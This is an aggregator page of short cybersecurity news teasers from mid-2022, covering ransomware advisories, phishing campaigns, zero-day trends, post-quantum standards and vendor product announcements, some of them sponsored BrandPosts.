What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-07-14 02:00:00 | 5 key considerations for your 2023 cybersecurity budget planning (lien direct) | As CISOs look to prepare their 2023 security budgets, some might be asking themselves, “where do I begin?” There are such varied and rapidly changing facets of defending organizations against cyber threats that the task of sorting out which risks need the most attention can seem overwhelming.Nevertheless, security leaders need to begin thinking about how much funding they will need and how they will allocate their budgets. “At a macro level, when defining strategic goals and developing budgets for security, CISOs should know that the status quo will likely leave security leaders with an impossible mission ahead-constrained to maintain operations and new initiatives,” says David Chaddock, director of cybersecurity for consultancy West Monroe.To read this article in full, please click here | Guideline | ★★ | |
|
2022-07-13 09:01:00 | Exostar launches CMMC 2.0-compliant Microsoft 365, other solutions for SMBs (lien direct) | Regulated industry community builder Exostar has announced new updates to its platform designed to help small- and medium-sized businesses (SMBs) overcome the technology, time, and cost obstacles of preparing for and demonstrating compliance with Cybersecurity Maturity Model Certification (CMMC) 2.0. The latest version of the CMMC requires businesses throughout the U.S. Defense Industrial Base (DIB) to comply with the certification as soon as May 2023 to participate in subsequent Department of Defense (DoD) contract solicitations, with any member of the DIB that stores or handles controlled unclassified information (CUI) required to meet the 110 practices defined at CMMC Maturity Level 2.To read this article in full, please click here | |||
|
2022-07-13 08:13:00 | BrandPost: Why Hackers are Increasingly Targeting Digital Supply Chains (lien direct) | For a large majority of the world, the SolarWinds hack in December 2020 was the first real introduction to digital supply chains and their vulnerabilities. But the reality is that hackers increasingly have been vested in software supply chain attacks, which increased 650% from July 2019 to May 2020 alone.Likewise, data from Netscout's 2H 2021 Threat Intelligence Report shows that hackers remain laser-focused on attacking the digital supply chain. Specifically, there was a 606% increase in attacks against software publishers from 1H 2021, as well as a 162% increase in attacks on computer manufacturers and a 263% increase against computer storage manufacturing. To read this article in full, please click here | Hack Threat | ||
|
2022-07-13 02:09:00 | Consulting firms jump on the Zero Trust bandwagon (lien direct) | Within a day of each other, the consulting and outsourcing firms Deloitte and HCL Technologies have both launched new managed cybersecurity services, as consultants look to capitalize on the growing appetite for the Zero Trust security model.On Tuesday, Deloitte unveiled its Zero Trust Access managed service, which is heavily influenced by its recent acquisition of TransientX. Then, on Wednesday, HCL announced a collaboration with Palo Alto Networks to offer managed SASE, cloud security, and threat detection and response for its customers.To read this article in full, please click here | Threat | Deloitte Deloitte | |
|
2022-07-13 02:00:00 | 10 tasks for a mid-year Microsoft network security review (lien direct) | It's the middle of 2022 and it's a perfect time to review your plans, goals and risks to your network, especially given the changing threat landscape. Ransomware, for example, has become more human targeted. Ransomware operators are now looking for additional methods and payloads as well as using extortion. Ransomware entry points range from targeting email and phishing lures as well as unpatched vulnerabilities to more targeted attacks.With that in mind, these are the ten tasks you should do for your mid-year security review:1. Review access and credential policies for third parties Attackers will scan for Remote Desktop Protocol (RDP) access and use brute-force attacks like credential stuffing. They know that people tend to reuse credentials that the attackers obtain from stolen databases to attempt to gain access in your network.To read this article in full, please click here | Ransomware Threat | ||
|
2022-07-12 14:20:00 | Office 365 phishing campaign that can bypass MFA targets 10,000 organizations (lien direct) | Security researchers from Microsoft have uncovered a large-scale phishing campaign that uses HTTPS proxying techniques to hijack Office 365 accounts. The attack is capable of bypassing multi-factor authentication (MFA) and has targeted over 10,000 organizations since September 2021.The goal of the campaign seems to be business email compromise (BEC), a type of attack where an employee's email account is used to trick other employees from the same organizations or external business partners to initiate fraudulent money transfers. According to the FBI's Internet Crime Complaint Center (IC3), BEC attacks have led to over $43 billion in losses between June 2016 and December 2021.To read this article in full, please click here | |||
|
2022-07-12 13:51:00 | U.S. NDAA heads into the home stretch with significant cybersecurity amendments pending (lien direct) | In late June, the House Armed Services Committee approved its version of the National Defense Authorization Act (NDAA) for the Fiscal Year 2023 with a $37 billion funding increase over what President Joe Biden requested. This week the whole House will debate the must-pass funding legislation.The NDAA, enacted every year to fund the U.S. military, has in previous years been a vehicle through which a wide swath of cybersecurity legislation has passed, given the struggles that standalone cybersecurity bills experienced. According to the nonprofit research organization Third Way, from 2017 to 2021, Members of Congress included 290 cyber-related provisions in the NDAAs, with the latter two NDAAs accounting for 60% of those provisions.To read this article in full, please click here | |||
|
2022-07-12 12:06:00 | BrandPost: Enterprises Need More Protection Against DDoS Attacks (lien direct) | Cloud-only distributed denial-of-service (DDoS) protection providers have been available for some time, but as services have become more mission-critical with less tolerance for downtime – and application-layer DDoS attacks have also become more complex – cloud-only solutions are not enough.Research and experience have proved that a multilayered DDoS defense strategy is the only holistic approach for protecting against modern DDoS threats. The analyst community has for a few years voiced strong support for a multilayered DDoS defense strategy backed by continuous threat intelligence. Some aspects of today's targeted complex attacks require on-premises components. In fact, because of the elusiveness of some attack types with regard to cloud solutions, on-premises purpose-built DDoS protection devices should be considered the foundation for a network DDoS protection posture.To read this article in full, please click here | Threat | ||
|
2022-07-12 08:32:00 | Concentric launches new data privacy and cybersecurity solution Eclipse (lien direct) | Private risk consultancy firm Concentric has announced the launch of Eclipse, a new “turnkey solution” designed to provide enhanced cybersecurity and digital privacy to users. The platform offers leveled subscription tiers, “à la carte” services, and defense-in-depth across consumer identities, devices, accounts and network connections, according to the company. The release comes as cybercrime continues to plague organizations across the globe and data becomes a key commodity of value to malicious cyber actors.Eclipse available in multi-tier and standalone options In a press release, Concentric stated that Eclipse packages are available to all users in three different tiers:To read this article in full, please click here | |||
|
2022-07-12 07:06:00 | Barracuda report: Almost everyone faced an industrial attack in the last year (lien direct) | A report commissioned by cloud security company Barracuda found that 94% of respondents have experienced some form of attack on their industrial IoT (IIoT) or operational technology (OT) systems during the last 12 months.The State of Industrial Security in 2022 report surveyed 800 senior IT and security officers responsible for these industrial systems.“In the current threat landscape, critical infrastructure is an attractive target for cybercriminals, but unfortunately IIoT/OT security projects often take a backseat to other security initiatives or fail due to cost or complexity, leaving organizations at risk,” said Tim Jefferson, senior vice president for data protection, network, and application security at Barracuda said in a statement accompanying the report.To read this article in full, please click here | Threat | ||
|
2022-07-12 05:00:00 | Catalogic Software adds newer detection and backup capabilities (lien direct) | Catalogic Software has announced the latest version of its DPX enterprise data protection software, DPX 4.8.1, which now includes GuardMode for early detection of ransomware, and DPX vPlus, cloud backup support for Microsoft 365 and other open virtualization platforms.Catalogic DPX is a proprietary data protection platform that offers the capability to backup data and applications from virtualized machines. According to Catalogic COO Sathya Sankaran, VMWare and HyperV make up about 80% of the virtualization hypervisor market, while the remaining 20% is attributed to a mix of players, including Microsoft 365, and various open source options such as XenServer, Oracle VM, KVM, RedHat, Acropolis, OpenStack and RHV/oVirt. Catalogic DPX vPlus will provide support for these other hypervisors that are “usually neglected” by other backup solutions, according to Sankaran.To read this article in full, please click here | |||
|
2022-07-12 02:00:00 | Locked in: How long is too long for security vendor contracts? (lien direct) | Stephanie Benoit Kurtz thought she had a good deal when, in one of her former CISO roles, she signed a three-year contract with a vendor for vulnerability management as a service.Benoit Kurtz inked the deal thinking that her security operations program would make full use of all the offered features. But she found early into the three-year stretch that her team only used about 60% of them.She says she was in a bind: paying for a product that wasn't really the right fit with no way to get out of the contract.“It's hard to go back to the manufacturer and say, 'I didn't need that module so can I get my money back?” They don't seem to want to engage in that conversation,” says Benoit Kurtz, a former security executive who is now lead faculty for the College of Information Systems and Technology at the University of Phoenix.To read this article in full, please click here | Vulnerability Guideline | ||
|
2022-07-11 06:00:00 | BrandPost: The Top 3 AI Myths in Cybersecurity (lien direct) | Whether it's in novels, or the movies based on them, artificial intelligence has been a subject of fascination for decades. The synthetic humans envisioned by Philip K. Dick remain (fortunately) the stuff of science fiction, artificial intelligence is real and playing an increasingly large role in many aspects of our lives.While it's fun to root against (or maybe for) human-like robots with AI brains, a much more mundane, but equally powerful form of AI is starting to play a role in cybersecurity.The goal is for AI to be a force multiplier for hardworking security professionals. Security operations center (SOC) analysts, as we saw in the most recent Devo SOC Performance Report™, are often overwhelmed by the never-ending number of alerts that hit their screens each day. Alert fatigue has become an industry-wide cause of analyst burnout.To read this article in full, please click here | |||
|
2022-07-11 02:00:00 | Understanding your API attack surface: How to get started (lien direct) | We live in a world of cloud computing, mobile devices and microservices. Nearly every application we interact with is powered by APIs, often many, especially when dealing with the leading cloud service providers (CSPs), mobile applications and microservice environments. This makes APIs a critical part of an organization's attack surface.Akamai estimates that roughly 83% of internet traffic is API-based. Other studies such as those from Salt Security state that API attacks increased over 600% from 2021 to 2022, and Gartner predicts that 90% of web-enabled applications will have broader attack surfaces due to exposed API's. The latest study from Imperva claims that vulnerable APIs are costing organizations between $40 and $70 billion annually.To read this article in full, please click here | Studies Guideline | ||
|
2022-07-11 02:00:00 | How Code42 automates insider risk response (lien direct) | Jadee Hanson's security analysts are always on the lookout for risky behaviors, so it's not surprising that they spot their business-unit colleagues sometimes acting in concerning ways, such as publicly sharing a document that might contain sensitive data.When that happens, an analyst reaches out to the colleague to determine whether he or she violated any security rules and to confirm he or she understands the company's cybersecurity best practices.Hanson, the CISO and CIO of Code42, a cybersecurity software company, sees value in that outreach.She says it can catch and correct problematic behavior, provide an opportunity for security awareness training and identify a potential policy breach at an early stage.To read this article in full, please click here | |||
|
2022-07-08 13:08:00 | Feds wave red flag over Maui ransomware (lien direct) | A cybersecurity advisory about the ransomware known as Maui has been issued by the FBI, CISA and U.S. Treasury Department. The agencies assert that North Korean state-sponsored cyber actors have used the malware since at least May 2021 to target healthcare and public health sector organizations.The FBI surmises that the threat actors are targeting healthcare organizations because those entities are critical to human life and health, so they're more likely to pay ransoms rather than risk disruption to their services. For that reason, the FBI and other agencies issuing the advisory maintain the state-sponsored actors will continue to target healthcare organizations.To read this article in full, please click here | Ransomware Malware Threat | ||
|
2022-07-07 15:39:00 | BrandPost: The Zero-Trust Pillars of Security (lien direct) | The National Institute of Standards and Technology's (NIST) zero-trust security framework presents a new way of solving an age-old problem of securing networks and information, and organizations of all sizes are rethinking their security architecture, processes, and procedures to adopt zero-trust principles.According to the NIST, “Zero trust (ZT) is the term for an evolving set of cybersecurity paradigms that move defenses from static, network-based perimeters to focus on users, assets, and resources. A zero trust architecture (ZTA) uses zero trust principles to plan industrial and enterprise infrastructure and workflows. Zero trust assumes there is no implicit trust granted to assets or user accounts based solely on their physical or network location or based on asset ownership ... Zero trust focuses on protecting resources, not network segments, as the network location is no longer seen as the prime component to the security posture of the resource.”To read this article in full, please click here | |||
|
2022-07-07 14:49:00 | BrandPost: How Blocking and Controlling Traffic Can Stop DDos Attacks (lien direct) | You only need to consider that more than 4.4 million distributed denial-of-service (DDoS) attacks occurred in the second half of 2021, to know with certainty that such attacks are always happening. It's not a matter of if a company will be impacted by a DDoS attack, it's a matter of when.But enterprises don't have to cower and wait for the inevitable to occur. In fact, enterprises and service providers can block 90% of DDoS attacks with two simple steps: blocking IP address spoofing and controlling inbound traffic.Blocking spoofed trafficIP address spoofing occurs when a device forges its source address for the purpose of impersonating another device. This is a preferred move by attackers when launching reflection/amplification attacks. Spoofing the source IP address forces an unwilling service to send its replies to the victim under attack.To read this article in full, please click here | |||
|
2022-07-07 14:39:00 | Wiz offers CVE-like cloud vulnerability registry, but will it gain traction? (lien direct) | Cloud security company Wiz recently announced a community-based website, cloudvulndb.org, that provides a centralized cloud vulnerabilities database for public access. While the database fills gaps left by MITRE's CVE vulnerability system and the current shared-responsibility model for cloud security issues, it will require additional, widespread industry support in order to be successful, according to security experts.The new vulnerability database is a continuation of Wiz's efforts to streamline the detection and management of cloud vulnerabilities which, it says, often tend to fall between the cracks among current systems.To read this article in full, please click here | Vulnerability | ||
|
2022-07-07 10:00:00 | Splashtop teams with Acronis for remote security support (lien direct) | Acronis and Splashtop announced a partnership Wednesday that promises to make troubleshooting security problems on endpoints easier. Under the deal, the pair will integrate Splashtop's secure remote access software with Acronis's Cyber Protect Cloud, a backup and cybersecurity platform. Through Splashtop, technicians can take control of computers and resolve issues without leaving the Acronis console.The new arrangement should be especially attractive to managed services providers (MSPs), who use Acronis's platform to allow their support staff to access clients' devices for faster remediation of incidents and more efficient technical support. Splashtop can also be used to provide on-demand help desk support to any computer or mobile device, regardless of device type or operating system, as well as be enabled to allow users to access their work computers remotely.To read this article in full, please click here | |||
|
2022-07-07 08:19:00 | Revelstoke\'s SOAR to improve case management with replicable sub-workflows (lien direct) | Security orchestration, automation, and response (SOAR) company Revelstoke has announced enhancements to its CASE management capabilities for provisioning the replication of redundant tasks by security analysts.Revelstoke's Case Automation Security Execution (CASE) management platform will use the company's in-house unified data layer (UDL) to develop and deploy automated, logic-based, sub-workflows for replication, the company said in a statement."This CASE functionality furthers Revelstoke's mission of putting sophisticated security automation in the hands of the security analysts that desperately need it to free them from the manual, repetitive tasks that bog them down," said Josh McCarthy, chief product officer and co-founder at Revelstoke. "This functionality allows them to have powerful blocks of reusable actions that they can apply to any and all cases that come into the system."To read this article in full, please click here | |||
|
2022-07-07 06:17:00 | Apple slaps hard against \'mercenary\' surveillance-as-a-service industry (lien direct) | The company is introducing Lockdown Mode to protect high-risk individuals against corrosive surveillance and attacks, and investing millions to improve protection on its devices. | |||
|
2022-07-07 04:26:00 | U.S. and UK warn local governments, businesses of China\'s influence operations (lien direct) | In a concerted effort to spread the word on the threat posed by China to governments at the state and local level as well as businesses of all sizes, the U.S. National Counterintelligence and Security Centre (NSCS), issued a “Safeguarding Our Future” bulletin. “Protecting Government and Business Leaders at the U.S. State and Local Level from People's Republic of China (PRC) Influence Operations” differs from previous warnings on China's use of social networks, pseudo-state-sponsored hackers, etc. The NSCS highlights how the Chinese intelligence apparatus uses the whole-of-government approach as they work to acquire information in support of the Communist Party of China (CCP) directives.To read this article in full, please click here | Threat Guideline | ||
|
2022-07-07 02:00:00 | How the US DHS develops hard-to-find cybersecurity skills (lien direct) | Cybersecurity skills are in short supply, and specialized cybersecurity skills are even harder to find. Take, for example, identity and access management skills, for which employers are paying an average 17% premium over base pay, according to the most recent statistics from the Foote Partners IT skills and pay index.Fortunately, for the US Department of Homeland Security (DHS), Amanda Conley is not one to shy away from resourcing rare and specialized skills. In her first staffing role after college, she found and staffed skills to support the design, manufacture and service of aircraft engines and auxiliary power units. “That's when I realized that having the right skills is a competitive advantage for my organization,” she explains. After that, she worked for the public sector, recruiting, hiring and developing skills for a variety of agencies.To read this article in full, please click here | |||
|
2022-07-07 02:00:00 | 5 things security pros want from XDR platforms (lien direct) | According to new research from ESG and the Information Systems Security Association (ISSA) 58% of organizations are consolidating or considering consolidating the number of security vendors they do business with. It's simply too hard to manage an army of disconnected security point tools, each requiring its own training, implementation, administration, and ongoing support.To read this article in full, please click here | |||
|
2022-07-06 16:17:00 | Attacker groups adopt new penetration testing tool Brute Ratel (lien direct) | Security researchers have recently identified several attack campaigns that use APT-like targeting techniques and deploy Brute Ratel C4 (BRc4), a relatively new adversary simulation framework. While hackers abusing penetration testing tools is not a new development -- Cobalt Strike and Metasploit's Meterpreter have been used by threat groups for years -- Brute Ratel is focused on detection evasion techniques, so it might pose a real challenge to defense teams."The emergence of a new penetration testing and adversary emulation capability is significant," researchers from security firm Palo Alto Networks said in a new report analyzing several recent samples. "Yet more alarming is the effectiveness of BRc4 at defeating modern defensive EDR and AV detection capabilities."To read this article in full, please click here | Tool Threat | ||
|
2022-07-06 09:58:00 | Smart factories unprepared for cyberattacks (lien direct) | Organizations operating smart factories largely agree that cybersecurity is a critical component to their operations. Many, however, are unprepared to deal with the growing number of cyberthreats against them, according to a report released last week by Capgemini, a provider of technology and digital transformation consulting services.The report, based on a survey of 950 organizations globally, finds that 80% agreed that cybersecurity is a critical component of a smart factory's operations and while more than half (51%) acknowledge the number of cyberattacks will likely increase over the next 12 months, their current levels of preparedness are low.To read this article in full, please click here | |||
|
2022-07-06 09:38:00 | BrandPost: 5 Attack Elements Organizations Should Monitor: Anatomy of an External Attack Surface (lien direct) | In today's landscape of cloud computing and decentralized work, external attack surfaces have grown to encompass multiple clouds, complex digital supply chains, and massive third-party ecosystems. For organizations, this means shifting their perception of comprehensive security in the face of ongoing global cyber threats.Security teams now have to defend their organization's presence across the Internet in the same way they defend operations behind their firewalls. And as more organizations adopt the principles of Zero Trust, protecting both internal and external attack surfaces becomes an Internet-scale challenge.To read this article in full, please click here | |||
|
2022-07-06 08:33:00 | BrandPost: Advancing Cybersecurity Skillsets Helps Organizations Against Threats (lien direct) | Worldwide, 80% of organizations suffered one or more breaches that they could attribute to a lack of cybersecurity skills and/or awareness according to Fortinet's recently published 2022 Cybersecurity Skills Gap research report. The lack of qualified cybersecurity professionals is a massive global problem affecting all types of organizations. Because the cybersecurity workforce is not growing fast enough to keep up with new threats, Fortinet has pledged to do something about it. By 2026, Fortinet is committed to training at least one million people in cybersecurity via our Training Advancement Agenda (TAA) and Training Institute programs.To read this article in full, please click here | Threat | ||
|
2022-07-06 03:56:00 | An updated pipeline security directive is underway, reflecting TSA struggles (lien direct) | In the immediate aftermath of the devastating ransomware attack on Colonial Pipeline, the U.S. Transportation Safety Administration (TSA) issued in May 2021 a hastily prepared security directive that required oil and gas pipeline companies to report every security incident to the Cybersecurity and Infrastructure Security Agency (CISA) no later than 12 hours after they identify it. Companies that fail to meet this and other security requirements in the directive are reported to be subject to fines starting at $7,000 per day.To read this article in full, please click here | |||
|
2022-07-06 02:00:00 | How to keep attackers from using PowerShell against you (lien direct) | Living off the land is not the title of a gardening book. It's the goal of attackers going after your network. Rather than installing malicious software on your network that antivirus software might flag, attackers use the code already there to launch attacks. The tools that you use to monitor, maintain and access your network are often the same code that attackers use to attack your network. PowerShell is a prime example.The U.S. National Security Agency (NSA), U.S. Cybersecurity and Infrastructure Security Agency (CISA), New Zealand's NCSC, and the UK NCSC recently released a document called Keeping PowerShell: Security Measures to Use and Embrace. This guidance recommends keeping PowerShell in your network rather than blocking but offers the following advice to keep it secure.To read this article in full, please click here | Tool | ||
|
2022-07-06 02:00:00 | What is decentralized identity? (lien direct) | Decentralized identity (DID) challenges some core assumptions about how online authentication works. In particular, the idea that a third-party authority is required to manage the sensitive data that comprises identity. DID holds out the promise of reducing reliance on such authority and returning some degree of control of the data to the data's owner, with possible privacy and accessibility boons.Traditionally, digital identity is maintained by organizations trusted to secure that information in their datastores. This model has, over time, revealed itself to be subject to several shortcomings. These shortcomings can be overviewed as follows:To read this article in full, please click here | |||
|
2022-07-06 02:00:00 | NIST names new post-quantum cryptography standards (lien direct) | The path to a secure future in a world with quantum computers just became a bit clearer. This week, the U.S. National Institute of Standards and Technology (NIST) announced the algorithms that were chosen in the third round of its competition to create a new post-quantum cryptography (PQC) standard built upon encryption algorithms that can resist the powers of quantum processors.NIST made an announcement with several layers. At the core were the choices for the main algorithms: CRYSTALS-Kyber for establishing a key and CRYSTALS-Dilithium for digital signatures. Both share the same theoretical approach which could make it simpler to implement both concurrently. NIST also announced that the digital signatures algorithms Falcon and SPHINCS+ would be standardized. It will also continue to study several other algorithms and perhaps standardize them during the fourth round of the competition.To read this article in full, please click here | |||
|
2022-07-05 11:52:00 | APT campaign targeting SOHO routers highlights risks to remote workers (lien direct) | A targeted attack campaign has been compromising home and small-business routers since late 2020 with the goal of hijacking network communications and infecting local computers with stealthy and sophisticated backdoors. Attacks against home routers are not new, but the implants used by attackers in this case were designed for local network reconnaissance and lateral movement instead of just abusing the router itself."The rapid shift to remote work in spring of 2020 presented a fresh opportunity for threat actors to subvert traditional defense-in-depth protections by targeting the weakest points of the new network perimeter -- devices which are routinely purchased by consumers but rarely monitored or patched -- small office/home office (SOHO) routers," researchers from Black Lotus Labs, the threat intelligence arm of telecommunications company Lumen Technologies said in a recent report.To read this article in full, please click here | Threat | ||
|
2022-07-05 03:40:00 | SQL injection, XSS vulnerabilities continue to plague organizations (lien direct) | Despite years topping vulnerability lists, SQL injection and cross-site scripting errors (XSS) remain the bane of security teams, according to a new report by a penetration-testing-as-a-service company.The report by BreachLock, based on 8,000 security tests performed in 2021, organizes its findings based on risk. Critical risk findings pose a very high threat to a company's data. High risks could have a catastrophic effect on an organization's operations, assets or individuals. Medium risks could have an adverse impact on operations, assets or individuals.To read this article in full, please click here | Vulnerability Threat | ||
|
2022-07-05 02:00:00 | 6 signs your IAM strategy is failing, and how to fix it (lien direct) | Companies have been developing and executing identity and access management (IAM) strategies for decades. "It started with mainframe time sharing, so nothing is new," says Jay Bretzmann, program director for security products at IDC. Despite that long experience, there are still opportunities for mistakes, especially when companies are upgrading their IAM platforms to those that can better deal with modern IT deployments.Here are six ways to tell that a company's IAM strategy is failing.1. Users can't access their applications, but criminals can The primary goal of an IAM platform is to allow legitimate users to access the resources that they need, while keeping out the bad guys. If the opposite is happening, then something is wrong. According to the latest Verizon Data Breach Incident Report, stolen credentials were the most common attack method last year, involved in half of all breaches and in over 80% of web application breaches.To read this article in full, please click here | Data Breach | ||
|
2022-07-05 02:00:00 | LockBit explained: How it has become the most popular ransomware (lien direct) | LockBit is one of the most prominent ransomware-as-a-service (RaaS) operations that has targeted organizations over the past several years. Since its launch in 2019, LockBit has constantly evolved, seeing unprecedented growth recently driven by other ransomware gangs disbanding.The LockBit creators sell access to the ransomware program and its infrastructure to third-party cybercriminals known as affiliates who break into networks and deploy it on systems for a cut of up to 75% of the money paid by victims in ransoms. Like most similar RaaS gangs, LockBit engages in double extortion tactics where its affiliates also exfiltrate data out of victim organizations and threaten to publish it online.To read this article in full, please click here | Ransomware | ||
|
2022-07-04 05:22:00 | Asia could be placing all the wrong cybersecurity bets (lien direct) | Over two-thirds (69%) of security leaders in Asia are confident about their organization's cybersecurity resilience, even as 48% also admit that there is still room for improvement, a new joint study by Microsoft and risk advisory firm Marsh has found.The Asian edition of The State of Cyber Resilience report, which had over 660 participants, including CEOs, CISOs, and risk managers, revealed that companies in Asia have experienced a far higher number of privacy breaches (28%) and denial of service attacks (21%) as compared to their global peers (18% and 14% respectively).Companies in Asia perceived privacy breaches or the loss of data as their top security concerns, while globally ransomware was observed as the biggest concern among organizations. As such, data loss is a critical concern that needs to be addressed and factored into cyberrisk management strategies, the report said.To read this article in full, please click here | Ransomware Guideline | ||
|
2022-07-04 02:00:00 | 11 top cloud security threats (lien direct) | Identity and access issues topped the list of concerns of IT pros in the Cloud Security Alliance's annual Top Threats to Cloud Computing: The Pandemic 11 report released earlier this month. "Data breaches and data loss were the top concerns last year," says CSA Global Vice President of Research John Yeoh. "This year, they weren't even in the top 11.""What that tells me is the cloud customer is getting a lot smarter," Yeoh continues. "They're getting away from worrying about end results-a data breach or loss is an end result-and looking at the causes of those results (data access, misconfigurations, insecure applications) and taking control of them."To read this article in full, please click here | Data Breach Threat | ||
|
2022-06-30 09:51:00 | Google Cloud previews advanced new API security features (lien direct) | Google Cloud's API security is getting a facelift, the company announced Thursday- a new Advanced API Security framework will help users identify potential threats, weed out bot traffic and identify data breaches caused by API misconfigurations or attacks.Advanced API Security is an outgrowth of the company's 2016 acquisition of Apigee, which became part of Google in a $625 million deal. According to Google, the new system allows users to dig more deeply into API traffic to detect unusual patterns, which may be signs of an exploit in progress.To read this article in full, please click here | |||
|
2022-06-30 02:00:00 | How you handle independent contractors may determine your insider threat risk (lien direct) | If one was to build a Venn diagram to compare the onboarding, educating, supervising, and offboarding of staff versus contract workers, the areas differences might offer a surprise. In this case, surprises aren't what a CISO wants to encounter. Thus, such a diagram as part of their insider risk threat management program highlights the delta between the two types of workers and how they are handled.The concept of core and context when it comes to separating the duties of the full-time-equivalent workforce into staff and independent contractors has long been an ongoing challenge for every enterprise and small- to medium-sized business. Add to the mix the contracted service offerings -- for example, a managed security service provider -- and entities find themselves handing the keys to the kingdom over to a third party to handle tasks at hand. On top of that, the past two-plus years have caused many an entity to undergo a momentous change to how employees/independent contractors engage, with a noted influx in the remote work option.To read this article in full, please click here | Threat | ||
|
2022-06-30 02:00:00 | Key takeaways from CSA\'s SaaS Governance Best Practices guide (lien direct) | SaaS governance and security is gaining attention among IT and security leaders. This is good, given that organizations are using exponentially more software-as-a-service (SaaS) than infrastructure-as-a-service (IaaS) offerings. Large enterprises are using upwards of 200 different SaaS offerings, compared to two or three IaaS providers, and only about 30% of organizations have any sort of SaaS security solutions in place.Despite the pervasive use of SaaS, it is overwhelmingly ungoverned with little insight into use, data storage or access control. That's why the Cloud Security Alliance (CSA) created the SaaS Governance Best Practices for Cloud Customers whitepaper, for which I was honored to serve as its co-lead. These are some of the key security takeaways from the SaaS governance best practices guidance.To read this article in full, please click here | Guideline | ||
|
2022-06-29 16:25:00 | SolarWinds creates new software build system in wake of Sunburst attack (lien direct) | SolarWinds became the poster child for attacks on software supply chains last year when a group of threat actors injected malicious code known as Sunburst into the company's software development system. It was subsequently distributed through an upgrade to it Orion product to thousands of government and enterprise customers worldwide.SolarWinds learned from the experience and has introduced new software development practices and technology to strengthen the integrity of its build environment. It includes what SolarWinds says is the first-of-its-kind “parallel build” process, where the software development takes place through multiple highly secure duplicate paths to establish a basis for integrity checks.To read this article in full, please click here | Threat | Solardwinds | |
|
2022-06-29 12:52:00 | Google Cloud gets new built-in security features (lien direct) | Google has announced that Google Cloud users will have access to two new security features, namely native integration with the MITRE ATT&CK threat classification and response framework and baked-in protection against DDoS attacks.Cloud Armor is Google's brand name for its DDoS mitigation and web application firewall service. It replicates many of the techniques used in traditionally structured DDoS protection systems, including per-client rate limiting, captchas to help weed out bot requests, and machine learning to counteract Layer 7 attacks. MITRE inclusion allows users to map Google Cloud's built-in security controls onto the MITRE ATT&CK rubric of threat classification and response planning, letting users automate certain types of security response.To read this article in full, please click here | Threat | ||
|
2022-06-29 12:36:00 | Sysdig Secure update adds ability to stop container attacks at runtime (lien direct) | Container and cloud security company Sysdig has announced a new capability, Drift Control, designed to detect and prevent container attacks at runtime.Drift Control will function as part of Sysdig Secure, built to detect vulnerabilities in containers. Sysdig Secure is a component in Sysdig's container intelligence platform, which includes several container-oriented security applications.Aiming to detect, prevent and speed incident response for containers that were modified in production, also known as container drifts, Drift Control offers the ability to close "dangerous security gaps" created due to deviations from the trusted original container.To read this article in full, please click here | |||
|
2022-06-29 08:42:00 | BrandPost: Four Key Ways CISOs can Strengthen OT Security (lien direct) | The past decade has seen an increase in the number of operational technology (OT) attacks and their impact on organizations. Fortinet recently released its 2022 State of Operational Technology and Cybersecurity Report revealing that 93% of OT organizations experienced one intrusion in the past year and 78% of them experienced more than three intrusions. The survey also found that CISOs and business leaders consider OT security a top concern. Outlined below are steps leaders can take to improve their OT security posture to decrease the risk of threats and keep up with bad actors.To read this article in full, please click here | Threat Guideline | ||
|
2022-06-29 02:00:00 | Why more zero-day vulnerabilities are being found in the wild (lien direct) | The number of zero-days exploited in the wild has been high over the past year and a half, with different kinds of actors using them. These vulnerabilities, which are unknown to the software maker, are leveraged by both state-sponsored groups and ransomware gangs.During the first half of this year, Google Project Zero counted almost 20 zero-days, most of which target products built by Microsoft, Apple and Google, with browsers and operating systems taking up large chunks. In addition, a critical remote code execution vulnerability was found in Atlassian's Confluence Server, which continues to be exploited. But in 2021, the number of in-the-wild zero-days was even higher. Project Zero found 58 vulnerabilities, while Mandiant detected 80--more than double compared to 2020.To read this article in full, please click here | Ransomware Vulnerability | ||
|
2022-06-29 02:00:00 | How and why threat actors target Microsoft Active Directory (lien direct) | Microsoft Active Directory debuted 22 years ago. In computer age, that's old technology. Threat actors like old technology because it often has legacy code or processes that are not secured to modern standards or organizations have not kept up with patches and recommended settings.Derek Melber, chief technology and security strategist for Tenable, discussed Active Directory risks at this year's RSA conference. Attackers target domains. If they see a device joined to Active Directory, they will continue with the attack. If they don't see a domain-joined machine, they will go on to another workstation. Below are some examples of how attackers can exploit legacy Active Directory vulnerabilitiesTo read this article in full, please click here | Threat | ||
|
2022-06-28 08:47:00 | Russian DDoS attack on Lithuania was planned on Telegram, Flashpoint says (lien direct) | Cyberattacks on the Lithuanian government and private institutions conducted by the Russian cybercollective Killnet, and the group's possible collaboration with the Conti hacking gang, were shared on the Telegram messaging service ahead of a major DDoS attack Monday, according to cybersecurity company Flashpoint.Multiple attacks on Lithuanian entities have been claimed by Killnet on its Telegram channel "WE ARE KILLNET," in response to Lithuania's June 18 restrictions of trade routes with Russia.A Flashpoint blog post confirms that Killnet warned about the attacks on the Telegram channel, highlighting the cloud-based instant messaging platform's use as a popular communication channel for threat actors.To read this article in full, please click here | Threat | ||
|
2022-06-28 05:00:00 | Microsoft\'s Defending Ukraine report offers fresh details on digital conflict and disinformation (lien direct) | Last week Microsoft published an in-depth examination of the early cyber lessons learned from the war in Ukraine, offering fresh insight into the scope of Russia's malicious digital activities and new details about the sophisticated and widespread Russian foreign influence operations surrounding the war. Microsoft has been uniquely positioned to observe the digital landscape in Ukraine since Russia invaded on February 24 and even before then.To read this article in full, please click here |
To see everything:
Our RSS (filtrered)
